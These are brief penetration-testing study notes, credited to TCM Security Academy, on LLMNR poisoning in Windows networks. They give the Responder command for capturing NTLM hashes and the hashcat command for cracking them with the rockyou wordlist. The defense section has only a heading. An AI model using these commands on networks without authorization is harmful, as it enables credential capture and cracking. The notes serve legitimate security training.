LLMNR Poisoning
What is LLMNR
Source: TCM Security Academy
Source: TCM Security Academy
Responder
Impacket: tool to abuse LLMNR: Best to run first thing in the morning
responder -I eth0 -rdwvAnd when there will be activity in the network we will be able to get hashes
Hascat
We use hashcat to crack the hashes we got previously
When looking for a module in hascat we can grep on the hash we need:
hashcat --help | grep NTLMCommand
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt
LLMNR Poisoning Defense
Source: TCM Security Academy
Last updated